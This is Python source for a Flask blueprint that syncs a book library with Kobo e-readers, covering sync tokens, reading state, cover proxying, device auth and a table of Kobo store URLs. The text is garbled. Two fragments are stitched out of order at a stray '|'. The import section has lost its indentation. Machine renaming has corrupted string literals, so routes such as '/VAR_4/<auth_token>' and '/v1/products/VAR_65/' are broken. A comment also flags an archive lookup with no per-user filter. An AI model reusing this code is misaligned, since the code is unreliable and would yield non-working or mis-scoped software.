    synced_entry.user_id = current_user.id
    synced_entry.book_id = VAR_21
    ub.session.add(synced_entry)
    try:
        ub.session.commit()
    except Exception:
        # Best effort: roll back on any commit failure (e.g. duplicate row).
        ub.session.rollback()
def FUNC_28(VAR_21):
    """Return the current user's KoboReadingState for book *VAR_21*, creating it on demand."""
    VAR_23 = ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == VAR_21,
                                                  ub.ReadBook.user_id == current_user.id).one_or_none()
    if not VAR_23:
        # fix: the new row was bound to the unused name `book_read` with the
        # undefined value `book_id`, so VAR_23 stayed None and the attribute
        # access below raised. Keyword is `book_id`, value is VAR_21.
        VAR_23 = ub.ReadBook(user_id=current_user.id, book_id=VAR_21)
    if not VAR_23.kobo_reading_state:
        # fix: was `VAR_21=book_id` — keyword/value swapped with an undefined name.
        VAR_22 = ub.KoboReadingState(user_id=VAR_23.user_id, book_id=VAR_21)
        VAR_22.current_bookmark = ub.KoboBookmark()
        VAR_22.statistics = ub.KoboStatistics()
        VAR_23.kobo_reading_state = VAR_22
    ub.session.add(VAR_23)
    ub.session_commit()
    return VAR_23.kobo_reading_state
def FUNC_29(VAR_12, VAR_22):
    """Serialize the reading state *VAR_22* of book *VAR_12* for the Kobo API."""
    reading_state = {
        "EntitlementId": VAR_12.uuid,
        "Created": FUNC_4(VAR_12.timestamp),
        "LastModified": FUNC_4(VAR_22.last_modified),
        "PriorityTimestamp": FUNC_4(VAR_22.priority_timestamp),
        "StatusInfo": FUNC_30(VAR_22.book_read_link),
        "Statistics": FUNC_31(VAR_22.statistics),
        "CurrentBookmark": FUNC_32(VAR_22.current_bookmark),
    }
    return reading_state
def FUNC_30(VAR_23):
    """Build the StatusInfo payload from a ub.ReadBook row."""
    status_info = {
        "LastModified": FUNC_4(VAR_23.last_modified),
        "Status": FUNC_25(VAR_23),
        "TimesStartedReading": VAR_23.times_started_reading,
    }
    last_started = VAR_23.last_time_started_reading
    if last_started:
        status_info["LastTimeStartedReading"] = FUNC_4(last_started)
    return status_info
def FUNC_31(VAR_24):
    """Build the Statistics payload, omitting fields that were never recorded."""
    stats = {
        "LastModified": FUNC_4(VAR_24.last_modified),
    }
    if VAR_24.spent_reading_minutes:
        stats["SpentReadingMinutes"] = VAR_24.spent_reading_minutes
    if VAR_24.remaining_time_minutes:
        stats["RemainingTimeMinutes"] = VAR_24.remaining_time_minutes
    return stats
def FUNC_32(VAR_25):
    """Build the CurrentBookmark payload; Location is included only when set."""
    bookmark = {
        "LastModified": FUNC_4(VAR_25.last_modified),
    }
    if VAR_25.progress_percent:
        bookmark["ProgressPercent"] = VAR_25.progress_percent
    if VAR_25.content_source_progress_percent:
        bookmark["ContentSourceProgressPercent"] = VAR_25.content_source_progress_percent
    if VAR_25.location_value:
        bookmark["Location"] = {
            "Value": VAR_25.location_value,
            "Type": VAR_25.location_type,
            "Source": VAR_25.location_source,
        }
    return bookmark
@VAR_4.route("/<VAR_11>/<VAR_26>/<VAR_27>/<VAR_29>/image.jpg", defaults={'Quality': ""})
@VAR_4.route("/<VAR_11>/<VAR_26>/<VAR_27>/<VAR_28>/<VAR_29>/image.jpg")
@requires_kobo_auth
def FUNC_33(VAR_11, VAR_26, VAR_27, VAR_28, VAR_29):
    """Serve the cover image for book *VAR_11*.

    Unknown covers are redirected to the Kobo image CDN when proxying is
    enabled, otherwise an empty JSON response is returned.
    """
    VAR_58 = helper.get_book_cover_with_uuid(
        VAR_11, use_generic_cover_on_failure=False
    )
    if not VAR_58:
        if config.config_kobo_proxy:
            VAR_5.debug("Cover for unknown VAR_12: %s proxied to kobo" % VAR_11)
            # fix: format() was called with the undefined names book_uuid/width/height
            # (NameError); the route parameters are VAR_11 / VAR_26 / VAR_27.
            return redirect(VAR_2 +
                            "/{VAR_11}/{VAR_26}/{VAR_27}/false/image.jpg".format(VAR_11=VAR_11,
                                                                                 VAR_26=VAR_26,
                                                                                 VAR_27=VAR_27), 307)
        else:
            VAR_5.debug("Cover for unknown VAR_12: %s requested" % VAR_11)
            return make_response(jsonify({}))
    VAR_5.debug("Cover request received for VAR_12 %s" % VAR_11)
    return VAR_58
@VAR_4.route("")
def FUNC_34():
    """Blueprint root: reply with an empty JSON object."""
    empty_payload = jsonify({})
    return make_response(empty_payload)
@VAR_4.route("/v1/library/<VAR_11>", methods=["DELETE"])
@requires_kobo_auth
def FUNC_35(VAR_11):
    """Handle a Kobo 'delete' by marking book *VAR_11* as archived (204 on success)."""
    VAR_5.info("Kobo VAR_12 deletion request received for VAR_12 %s" % VAR_11)
    VAR_12 = calibre_db.get_book_by_uuid(VAR_11)
    if not VAR_12:
        VAR_5.info(u"Book %s not found in database", VAR_11)
        return FUNC_3()
    VAR_21 = VAR_12.id
    # NOTE(review): lookup is not filtered by user_id — confirm whether archive
    # state is meant to be global or per-user.
    VAR_59 = (
        ub.session.query(ub.ArchivedBook)
        .filter(ub.ArchivedBook.book_id == VAR_21)
        .first()
    )
    if not VAR_59:
        # fix: the new row was bound to the unused name `archived_book` with the
        # undefined value `book_id`, leaving VAR_59 = None and crashing below.
        VAR_59 = ub.ArchivedBook(user_id=current_user.id, book_id=VAR_21)
    VAR_59.is_archived = True
    VAR_59.last_modified = datetime.datetime.utcnow()
    ub.session.merge(VAR_59)
    ub.session_commit()
    return ("", 204)
@VAR_4.route("/v1/library/<VAR_30>", methods=["DELETE", "GET"])
def FUNC_36(VAR_30=None):
    """Fallback for unimplemented library endpoints: log, then proxy or reply {}."""
    VAR_5.debug("Unimplemented Library Request received: %s", request.base_url)
    return FUNC_3()
@VAR_4.route("/v1/user/loyalty/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/user/profile", methods=["GET", "POST"])
@VAR_4.route("/v1/user/wishlist", methods=["GET", "POST"])
@VAR_4.route("/v1/user/recommendations", methods=["GET", "POST"])
@VAR_4.route("/v1/analytics/<VAR_30>", methods=["GET", "POST"])
def FUNC_37(VAR_30=None):
    """Fallback for unimplemented user/analytics endpoints: log, then proxy or reply {}."""
    VAR_5.debug("Unimplemented User Request received: %s", request.base_url)
    return FUNC_3()
@VAR_4.route("/v1/products/<VAR_30>/prices", methods=["GET", "POST"])
@VAR_4.route("/v1/products/<VAR_30>/recommendations", methods=["GET", "POST"])
@VAR_4.route("/v1/products/<VAR_30>/nextread", methods=["GET", "POST"])
@VAR_4.route("/v1/products/<VAR_30>/reviews", methods=["GET", "POST"])
@VAR_4.route("/v1/products/VAR_65/external/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/products/VAR_65/series/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/products/VAR_65/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/products/dailydeal", methods=["GET", "POST"])
@VAR_4.route("/v1/products", methods=["GET", "POST"])
def FUNC_38(VAR_30=None):
    """Fallback for unimplemented store/product endpoints: log, then proxy or reply {}."""
    VAR_5.debug("Unimplemented Products Request received: %s", request.base_url)
    return FUNC_3()
def FUNC_39():
    """Issue locally generated access/refresh tokens for un-proxied Kobo auth."""
    request_data = request.get_json()
    access_token = base64.b64encode(os.urandom(24)).decode('utf-8')
    refresh_token = base64.b64encode(os.urandom(24)).decode('utf-8')
    token_payload = {
        "AccessToken": access_token,
        "RefreshToken": refresh_token,
        "TokenType": "Bearer",
        "TrackingId": str(uuid.uuid4()),
        "UserKey": request_data['UserKey'],
    }
    return make_response(jsonify(token_payload))
@VAR_4.route("/v1/auth/device", methods=["POST"])
@requires_kobo_auth
def FUNC_40():
    """Device auth: proxy to the real store when configured, else self-issue tokens."""
    VAR_5.debug('Kobo Auth request')
    if config.config_kobo_proxy:
        try:
            return FUNC_3()
        except Exception:
            VAR_5.error("Failed to receive or parse VAR_44 from Kobo's auth endpoint. Falling back to un-proxied mode.")
    return FUNC_39()
@VAR_4.route("/v1/initialization")
@requires_kobo_auth
def FUNC_41():
    """Serve the Kobo "initialization" resource map.

    When proxying is enabled the real store's resources are fetched first;
    otherwise (or on failure) the built-in table from FUNC_43() is used. The
    image URL templates are then rewritten so covers are served by this server.
    """
    VAR_5.info('Init')
    VAR_63 = None
    if config.config_kobo_proxy:
        try:
            VAR_35 = FUNC_2()
            VAR_86 = VAR_35.json()
            if "Resources" in VAR_86:
                VAR_63 = VAR_86["Resources"]
        except Exception:
            VAR_5.error("Failed to receive or parse VAR_44 from Kobo's init endpoint. Falling back to un-proxied mode.")
    if not VAR_63:
        # fix: the fallback table was bound to the unused name `kobo_resources`,
        # leaving VAR_63 = None and crashing on the subscript assignments below.
        VAR_63 = FUNC_43()
    if not current_app.wsgi_app.is_proxied:
        VAR_5.debug('Kobo: Received unproxied request, changed request port to external server port')
        # Strip a ":port" suffix (keeping IPv6 literals intact) and substitute
        # the configured external port for the one the request arrived on.
        if ':' in request.host and not request.host.endswith(']'):
            VAR_80 = "".join(request.host.split(':')[:-1])
        else:
            VAR_80 = request.host
        VAR_77 = "{url_scheme}://{url_base}:{url_port}".format(
            url_scheme=request.scheme,
            url_base=VAR_80,
            url_port=config.config_external_port
        )
        VAR_5.debug('Kobo: Received unproxied request, changed request url to %s', VAR_77)
        VAR_63["image_host"] = VAR_77
        VAR_63["image_url_quality_template"] = unquote(VAR_77 +
                                                       url_for("kobo.HandleCoverImageRequest",
                                                               auth_token=kobo_auth.get_auth_token(),
                                                               VAR_11="{ImageId}",
                                                               VAR_26="{VAR_26}",
                                                               VAR_27="{VAR_27}",
                                                               VAR_28='{VAR_28}',
                                                               VAR_29='isGreyscale'))
        VAR_63["image_url_template"] = unquote(VAR_77 +
                                               url_for("kobo.HandleCoverImageRequest",
                                                       auth_token=kobo_auth.get_auth_token(),
                                                       VAR_11="{ImageId}",
                                                       VAR_26="{VAR_26}",
                                                       VAR_27="{VAR_27}",
                                                       VAR_29='false'))
    else:
        VAR_63["image_host"] = url_for("web.index", _external=True).strip("/")
        VAR_63["image_url_quality_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
                                                               auth_token=kobo_auth.get_auth_token(),
                                                               VAR_11="{ImageId}",
                                                               VAR_26="{VAR_26}",
                                                               VAR_27="{VAR_27}",
                                                               VAR_28='{VAR_28}',
                                                               VAR_29='isGreyscale',
                                                               _external=True))
        VAR_63["image_url_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
                                                       auth_token=kobo_auth.get_auth_token(),
                                                       VAR_11="{ImageId}",
                                                       VAR_26="{VAR_26}",
                                                       VAR_27="{VAR_27}",
                                                       VAR_29='false',
                                                       _external=True))
    VAR_44 = make_response(jsonify({"Resources": VAR_63}))
    # Kobo devices expect this header on a successful initialization response.
    VAR_44.headers["x-VAR_4-apitoken"] = "e30="
    return VAR_44
@VAR_4.route("/download/<VAR_21>/<VAR_13>")
@requires_kobo_auth
@download_required
def FUNC_42(VAR_21, VAR_13):
    """Hand the actual file download off to the shared helper (client type 'kobo')."""
    return get_download_link(VAR_21, VAR_13, "kobo")
def FUNC_43():
    """Return the static fallback "Resources" table served to Kobo devices.

    Used when the real store cannot be reached (or proxying is disabled).
    All entries point at the official Kobo endpoints; the image URL templates
    are overwritten by the caller to point at this server.
    """
    return {
        "account_page": "https://secure.kobobooks.com/profile",
        "account_page_rakuten": "https://my.rakuten.co.jp/",
        "add_entitlement": "https://storeapi.kobo.com/v1/library/{RevisionIds}",
        "affiliaterequest": "https://storeapi.kobo.com/v1/affiliate",
        "audiobook_subscription_orange_deal_inclusion_url": "https://authorize.kobo.com/inclusion",
        "authorproduct_recommendations": "https://storeapi.kobo.com/v1/products/VAR_65/authors/recommendations",
        "autocomplete": "https://storeapi.kobo.com/v1/products/autocomplete",
        "blackstone_header": {"key": "x-amz-request-payer", "value": "requester"},
        "book": "https://storeapi.kobo.com/v1/products/VAR_65/{ProductId}",
        "book_detail_page": "https://store.kobobooks.com/{culture}/ebook/{slug}",
        "book_detail_page_rakuten": "https://VAR_65.rakuten.co.jp/rk/{crossrevisionid}",
        "book_landing_page": "https://store.kobobooks.com/ebooks",
        "book_subscription": "https://storeapi.kobo.com/v1/products/VAR_65/subscriptions",
        "categories": "https://storeapi.kobo.com/v1/categories",
        "categories_page": "https://store.kobobooks.com/ebooks/categories",
        "category": "https://storeapi.kobo.com/v1/categories/{CategoryId}",
        "category_featured_lists": "https://storeapi.kobo.com/v1/categories/{CategoryId}/featured",
        "category_products": "https://storeapi.kobo.com/v1/categories/{CategoryId}/products",
        "checkout_borrowed_book": "https://storeapi.kobo.com/v1/library/borrow",
        "configuration_data": "https://storeapi.kobo.com/v1/configuration",
        "content_access_book": "https://storeapi.kobo.com/v1/products/VAR_65/{ProductId}/access",
        "customer_care_live_chat": "https://v2.zopim.com/widget/livechat.html?key=Y6gwUmnu4OATxN3Tli4Av9bYN319BTdO",
        "daily_deal": "https://storeapi.kobo.com/v1/products/dailydeal",
        "deals": "https://storeapi.kobo.com/v1/deals",
        "delete_entitlement": "https://storeapi.kobo.com/v1/library/{Ids}",
        "delete_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
        "delete_tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/VAR_16/delete",
        "device_auth": "https://storeapi.kobo.com/v1/auth/device",
        "device_refresh": "https://storeapi.kobo.com/v1/auth/refresh",
        "dictionary_host": "https://kbdownload1-a.akamaihd.net",
        "discovery_host": "https://discovery.kobobooks.com",
        "eula_page": "https://www.kobo.com/termsofuse?style=onestore",
        "exchange_auth": "https://storeapi.kobo.com/v1/auth/exchange",
        "external_book": "https://storeapi.kobo.com/v1/products/VAR_65/external/{Ids}",
        "facebook_sso_page": "https://authorize.kobo.com/signin/provider/Facebook/login?returnUrl=http://store.kobobooks.com/",
        "featured_list": "https://storeapi.kobo.com/v1/products/featured/{FeaturedListId}",
        "featured_lists": "https://storeapi.kobo.com/v1/products/featured",
        "free_books_page": {
            "EN": "https://www.kobo.com/{region}/{language}/p/free-ebooks",
            "FR": "https://www.kobo.com/{region}/{language}/p/livres-gratuits",
            "IT": "https://www.kobo.com/{region}/{language}/p/libri-gratuiti",
            "NL": "https://www.kobo.com/{region}/{language}/List/bekijk-het-overzicht-van-gratis-ebooks/QpkkVWnUw8sxmgjSlCbJRg",
            "PT": "https://www.kobo.com/{region}/{language}/p/livros-gratis",
        },
        "fte_feedback": "https://storeapi.kobo.com/v1/products/ftefeedback",
        "get_tests_request": "https://storeapi.kobo.com/v1/analytics/gettests",
        "giftcard_epd_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem-ereader",
        "giftcard_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem",
        "help_page": "https://www.kobo.com/help",
        "kobo_audiobooks_enabled": "False",
        "kobo_audiobooks_orange_deal_enabled": "False",
        "kobo_audiobooks_subscriptions_enabled": "False",
        "kobo_nativeborrow_enabled": "True",
        "kobo_onestorelibrary_enabled": "False",
        "kobo_redeem_enabled": "True",
        "kobo_shelfie_enabled": "False",
        "kobo_subscriptions_enabled": "False",
        "kobo_superpoints_enabled": "False",
        "kobo_wishlist_enabled": "True",
        "library_book": "https://storeapi.kobo.com/v1/user/library/VAR_65/{LibraryItemId}",
        "library_items": "https://storeapi.kobo.com/v1/user/library",
        "library_metadata": "https://storeapi.kobo.com/v1/library/{Ids}/metadata",
        "library_prices": "https://storeapi.kobo.com/v1/user/library/previews/prices",
        "library_stack": "https://storeapi.kobo.com/v1/user/library/stacks/{LibraryItemId}",
        "library_sync": "https://storeapi.kobo.com/v1/library/sync",
        "love_dashboard_page": "https://store.kobobooks.com/{culture}/kobosuperpoints",
        "love_points_redemption_page": "https://store.kobobooks.com/{culture}/KoboSuperPointsRedemption?productId={ProductId}",
        "magazine_landing_page": "https://store.kobobooks.com/emagazines",
        "notifications_registration_issue": "https://storeapi.kobo.com/v1/notifications/registration",
        "oauth_host": "https://oauth.kobo.com",
        "overdrive_account": "https://auth.overdrive.com/account",
        "overdrive_library": "https://{libraryKey}.auth.overdrive.com/library",
        "overdrive_library_finder_host": "https://libraryfinder.api.overdrive.com",
        "overdrive_thunder_host": "https://thunder.api.overdrive.com",
        "password_retrieval_page": "https://www.kobobooks.com/passwordretrieval.html",
        "post_analytics_event": "https://storeapi.kobo.com/v1/analytics/event",
        "privacy_page": "https://www.kobo.com/privacypolicy?style=onestore",
        "product_nextread": "https://storeapi.kobo.com/v1/products/{ProductIds}/nextread",
        "product_prices": "https://storeapi.kobo.com/v1/products/{ProductIds}/prices",
        "product_recommendations": "https://storeapi.kobo.com/v1/products/{ProductId}/recommendations",
        "product_reviews": "https://storeapi.kobo.com/v1/products/{ProductIds}/reviews",
        "products": "https://storeapi.kobo.com/v1/products",
        "provider_external_sign_in_page": "https://authorize.kobo.com/ExternalSignIn/{providerName}?returnUrl=http://store.kobobooks.com/",
        "purchase_buy": "https://www.kobo.com/checkout/createpurchase/",
        "purchase_buy_templated": "https://www.kobo.com/{culture}/checkout/createpurchase/{ProductId}",
        "quickbuy_checkout": "https://storeapi.kobo.com/v1/store/quickbuy/{PurchaseId}/checkout",
        "quickbuy_create": "https://storeapi.kobo.com/v1/store/quickbuy/purchase",
        "rating": "https://storeapi.kobo.com/v1/products/{ProductId}/rating/{Rating}",
        "reading_state": "https://storeapi.kobo.com/v1/library/{Ids}/state",
        "redeem_interstitial_page": "https://store.kobobooks.com",
        "registration_page": "https://authorize.kobo.com/signup?returnUrl=http://store.kobobooks.com/",
        "related_items": "https://storeapi.kobo.com/v1/products/{Id}/related",
        "remaining_book_series": "https://storeapi.kobo.com/v1/products/VAR_65/series/{SeriesId}",
        "rename_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
        "review": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}",
        "review_sentiment": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}/sentiment/{Sentiment}",
        "shelfie_recommendations": "https://storeapi.kobo.com/v1/user/recommendations/shelfie",
        "sign_in_page": "https://authorize.kobo.com/signin?returnUrl=http://store.kobobooks.com/",
        "social_authorization_host": "https://social.kobobooks.com:8443",
        "social_host": "https://social.kobobooks.com",
        "stacks_host_productId": "https://store.kobobooks.com/collections/byproductid/",
        "store_home": "www.kobo.com/{region}/{language}",
        "store_host": "store.kobobooks.com",
        "store_newreleases": "https://store.kobobooks.com/{culture}/List/new-releases/961XUjtsU0qxkFItWOutGA",
        "store_search": "https://store.kobobooks.com/{culture}/Search?Query={query}",
        "store_top50": "https://store.kobobooks.com/{culture}/ebooks/Top",
        "tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/Items",
        "tags": "https://storeapi.kobo.com/v1/library/tags",
        "taste_profile": "https://storeapi.kobo.com/v1/products/tasteprofile",
        "update_accessibility_to_preview": "https://storeapi.kobo.com/v1/library/{EntitlementIds}/preview",
        "use_one_store": "False",
        "user_loyalty_benefits": "https://storeapi.kobo.com/v1/user/loyalty/benefits",
        "user_platform": "https://storeapi.kobo.com/v1/user/platform",
        "user_profile": "https://storeapi.kobo.com/v1/user/profile",
        "user_ratings": "https://storeapi.kobo.com/v1/user/ratings",
        "user_recommendations": "https://storeapi.kobo.com/v1/user/recommendations",
        "user_reviews": "https://storeapi.kobo.com/v1/user/reviews",
        "user_wishlist": "https://storeapi.kobo.com/v1/user/wishlist",
        "userguide_host": "https://kbdownload1-a.akamaihd.net",
        "wishlist_page": "https://store.kobobooks.com/{region}/{language}/account/wishlist",
    }
|
import base64
import datetime
import sys
import os
import uuid
from time import gmtime, strftime
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from flask import (
Blueprint,
request,
make_response,
jsonify,
current_app,
url_for,
redirect,
abort
)
from flask_login import current_user
from werkzeug.datastructures import Headers
from sqlalchemy import func
from sqlalchemy.sql.expression import and_, or_
from sqlalchemy.exc import StatementError
from sqlalchemy.sql import select
import requests
from . import config, logger, kobo_auth, db, calibre_db, helper, VAR_17 as shelf_lib, ub, csrf
from .constants import sqlalchemy_version2
from .helper import get_download_link
from .services import SyncToken as SyncToken
from .web import download_required
from .kobo_auth import requires_kobo_auth, get_auth_token
# Calibre file formats mapped to the format names advertised to Kobo devices.
VAR_0 = {"KEPUB": ["KEPUB"], "EPUB": ["EPUB3", "EPUB"]}
# Upstream Kobo store API host and image CDN used when proxying requests.
VAR_1 = "https://storeapi.kobo.com"
VAR_2 = "https://kbimages1-a.akamaihd.net"
# presumably a page/batch size limit — its use is outside this chunk; TODO confirm
VAR_3 = 100
# All Kobo endpoints live under /VAR_4/<auth_token>/; the token is consumed by
# the kobo_auth url-value preprocessor registered below.
VAR_4 = Blueprint("kobo", __name__, url_prefix="/VAR_4/<auth_token>")
kobo_auth.disable_failed_auth_redirect_for_blueprint(VAR_4)
kobo_auth.register_url_value_preprocessor(VAR_4)
# Module-level logger.
VAR_5 = logger.create()
def FUNC_0():
    """Rebuild the corresponding Kobo store URL for the current request path."""
    # Take everything after the blueprint prefix, then drop the auth-token
    # segment (the part before the first "/").
    remainder = request.full_path.rpartition("/VAR_4/")[2]
    store_path = remainder.rstrip("?").partition("/")[2]
    return VAR_1 + "/" + store_path
# Hop-by-hop / transport headers that must be stripped before relaying a
# proxied Kobo store response back to the device.
VAR_6 = [
    "connection",
    "content-encoding",
    "content-length",
    "transfer-encoding",
]
def FUNC_1():
    """Report whether Kobo sync is enabled in the application configuration."""
    return config.config_kobo_sync
def FUNC_2(VAR_7=None):
    """Forward the current request to the real Kobo store and return its response.

    *VAR_7* (a SyncToken), when given, stamps Kobo-specific headers onto the
    outgoing request. Redirects are not followed; timeouts are (2s, 10s).
    """
    outgoing_headers = Headers(request.headers)
    # Drop the local Host header so requests sets the store's host instead.
    outgoing_headers.remove("Host")
    if VAR_7:
        VAR_7.set_kobo_store_header(outgoing_headers)
    store_response = requests.request(
        method=request.method,
        url=FUNC_0(),
        headers=outgoing_headers,
        data=request.get_data(),
        allow_redirects=False,
        timeout=(2, 10)
    )
    return store_response
def FUNC_3():
    """Proxy the request to the Kobo store when proxying is on, else answer {}."""
    if not config.config_kobo_proxy:
        return make_response(jsonify({}))
    if request.method == "GET":
        # GETs can simply be redirected to the store.
        return redirect(FUNC_0(), 307)
    store_response = FUNC_2()
    relayed_headers = store_response.headers
    # Strip headers that would not survive re-transmission.
    for header_key in VAR_6:
        relayed_headers.pop(header_key, default=None)
    return make_response(
        store_response.content, store_response.status_code, relayed_headers.items()
    )
def FUNC_4(VAR_8):
    """Format datetime *VAR_8* as the UTC timestamp string Kobo expects.

    Falls back to the current time when *VAR_8* is not datetime-like.
    """
    try:
        return VAR_8.strftime("%Y-%m-%dT%H:%M:%SZ")
    except AttributeError as exc:
        VAR_5.debug("Timestamp not valid: {}".format(exc))
        return datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
@VAR_4.route("/v1/library/sync")
@requires_kobo_auth
@download_required
def FUNC_5():
    """Answer a Kobo device library-sync request.

    Collects book entitlements and reading states changed since the
    timestamps in the device's sync token, pages the result (VAR_3 books per
    response) and advances the token's high-water marks.
    """
    VAR_7 = SyncToken.SyncToken.from_headers(request.headers)
    VAR_5.info("Kobo library sync request received.")
    VAR_5.debug("SyncToken: {}".format(VAR_7))
    if not current_app.wsgi_app.is_proxied:
        VAR_5.debug('Kobo: Received unproxied request, changed request port to external server port')
    # High-water marks carried over from the token; advanced as items are collected.
    VAR_36 = VAR_7.books_last_modified
    VAR_37 = VAR_7.books_last_created
    VAR_38 = VAR_7.reading_state_last_modified
    VAR_39 = datetime.datetime.min
    VAR_9 = []
    calibre_db.reconnect_db(config, ub.app_DB_path)
    VAR_18 = current_user.kobo_only_shelves_sync
    if VAR_18:
        # Restrict the sync to books on shelves flagged for Kobo sync.
        if sqlalchemy_version2:
            VAR_64 = select(db.Books,
                            ub.ArchivedBook.last_modified,
                            ub.BookShelf.date_added,
                            ub.ArchivedBook.is_archived)
        else:
            VAR_64 = calibre_db.session.query(db.Books,
                                              ub.ArchivedBook.last_modified,
                                              ub.BookShelf.date_added,
                                              ub.ArchivedBook.is_archived)
        # Fixed: the base query was extended under its pre-rename identifier
        # ('changed_entries'), raising NameError at runtime.
        VAR_64 = (VAR_64
                  .join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
                  .join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
                  .filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
                              ub.KoboSyncedBooks.book_id == None))
                  .filter(ub.BookShelf.date_added > VAR_7.books_last_modified)
                  .filter(db.Data.format.in_(VAR_0))
                  .filter(calibre_db.common_filters())
                  .order_by(db.Books.id)
                  .order_by(ub.ArchivedBook.last_modified)
                  .join(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)
                  .join(ub.Shelf)
                  .filter(ub.Shelf.user_id == current_user.id)
                  .filter(ub.Shelf.kobo_sync)
                  .distinct()
                  )
    else:
        if sqlalchemy_version2:
            VAR_64 = select(db.Books, ub.ArchivedBook.last_modified, ub.ArchivedBook.is_archived)
        else:
            VAR_64 = calibre_db.session.query(db.Books,
                                              ub.ArchivedBook.last_modified,
                                              ub.ArchivedBook.is_archived)
        # Fixed: same pre-rename NameError as above.
        VAR_64 = (VAR_64
                  .join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
                  .join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
                  .filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
                              ub.KoboSyncedBooks.book_id == None))
                  .filter(calibre_db.common_filters())
                  .filter(db.Data.format.in_(VAR_0))
                  .order_by(db.Books.last_modified)
                  .order_by(db.Books.id)
                  )
    VAR_40 = []
    if sqlalchemy_version2:
        VAR_65 = calibre_db.session.execute(VAR_64.limit(VAR_3))
    else:
        VAR_65 = VAR_64.limit(VAR_3)
    for VAR_12 in VAR_65:
        # Remember the book as synced so it is not re-sent next time.
        FUNC_27(VAR_12.Books.id)
        VAR_66 = [data.format for data in VAR_12.Books.data]
        # Kepubify EPUB-only books on the fly when a converter is configured.
        if not 'KEPUB' in VAR_66 and config.config_kepubifypath and 'EPUB' in VAR_66:
            helper.convert_book_format(VAR_12.Books.id, config.config_calibre_dir, 'EPUB', 'KEPUB', current_user.name)
        VAR_22 = FUNC_28(VAR_12.Books.id)
        VAR_67 = {
            "BookEntitlement": FUNC_9(VAR_12.Books, VAR_14=(VAR_12.is_archived == True)),
            "BookMetadata": FUNC_16(VAR_12.Books),
        }
        if VAR_22.last_modified > VAR_7.reading_state_last_modified:
            VAR_67["ReadingState"] = FUNC_29(VAR_12.Books, VAR_22)
            VAR_38 = max(VAR_38, VAR_22.last_modified)
            VAR_40.append(VAR_12.Books.id)
        VAR_68 = VAR_12.Books.timestamp
        try:
            VAR_68 = max(VAR_68, VAR_12.date_added)
        except AttributeError:
            pass
        if VAR_68 > VAR_7.books_last_created:
            VAR_9.append({"NewEntitlement": VAR_67})
        else:
            VAR_9.append({"ChangedEntitlement": VAR_67})
        VAR_36 = max(
            VAR_12.Books.last_modified, VAR_36
        )
        try:
            VAR_36 = max(
                VAR_36, VAR_12.date_added
            )
        except AttributeError:
            pass
        VAR_37 = max(VAR_68, VAR_37)
    # Determine the newest archive change so the token can skip older ones.
    if sqlalchemy_version2:
        VAR_41 = calibre_db.session.execute(VAR_64
                                            .filter(ub.ArchivedBook.is_archived)
                                            .order_by(func.datetime(ub.ArchivedBook.last_modified).desc()))\
            .columns(db.Books).first()
    else:
        VAR_41 = VAR_64.from_self().filter(ub.ArchivedBook.is_archived) \
            .order_by(func.datetime(ub.ArchivedBook.last_modified).desc()).first()
    # Fixed: 'max_change' was the pre-rename identifier for VAR_41 (NameError).
    VAR_41 = VAR_41.last_modified if VAR_41 else VAR_39
    VAR_39 = max(VAR_39, VAR_41)
    if sqlalchemy_version2:
        VAR_69 = calibre_db.session.execute(VAR_64).all()
        VAR_70 = len(VAR_69)
    else:
        VAR_70 = VAR_64.count()
    VAR_5.debug("Remaining VAR_65 to Sync: {}".format(VAR_70))
    # Reading states changed independently of the books handled above.
    VAR_42 = ub.session.query(ub.KoboReadingState)
    if VAR_18:
        VAR_42 = VAR_42.join(ub.BookShelf,
                             ub.KoboReadingState.book_id == ub.BookShelf.book_id)\
            .join(ub.Shelf)\
            .filter(current_user.id == ub.Shelf.user_id)\
            .filter(ub.Shelf.kobo_sync,
                    or_(
                        func.datetime(ub.KoboReadingState.last_modified) > VAR_7.reading_state_last_modified,
                        func.datetime(ub.BookShelf.date_added) > VAR_7.books_last_modified
                    )).distinct()
    else:
        VAR_42 = VAR_42.filter(
            func.datetime(ub.KoboReadingState.last_modified) > VAR_7.reading_state_last_modified)
    VAR_42 = VAR_42.filter(
        and_(ub.KoboReadingState.user_id == current_user.id,
             ub.KoboReadingState.book_id.notin_(VAR_40)))
    for VAR_22 in VAR_42.all():
        VAR_12 = calibre_db.session.query(db.Books).filter(db.Books.id == VAR_22.book_id).one_or_none()
        if VAR_12:
            VAR_9.append({
                "ChangedReadingState": {
                    "ReadingState": FUNC_29(VAR_12, VAR_22)
                }
            })
            VAR_38 = max(VAR_38, VAR_22.last_modified)
    FUNC_22(VAR_7, VAR_9, VAR_18)
    VAR_7.books_last_created = VAR_37
    VAR_7.books_last_modified = VAR_36
    VAR_7.archive_last_modified = VAR_39
    VAR_7.reading_state_last_modified = VAR_38
    return FUNC_6(VAR_7, VAR_9, VAR_70)
def FUNC_6(VAR_7, VAR_9, VAR_10=False):
    """Build the JSON sync response for the device.

    When store proxying is on, the Kobo store's own sync items and sync
    headers are merged in. A truthy VAR_10 (remaining item count) sets the
    'continue' header so the device immediately requests the next page.
    """
    VAR_43 = {}
    if config.config_kobo_proxy:
        try:
            VAR_35 = FUNC_2(VAR_7)
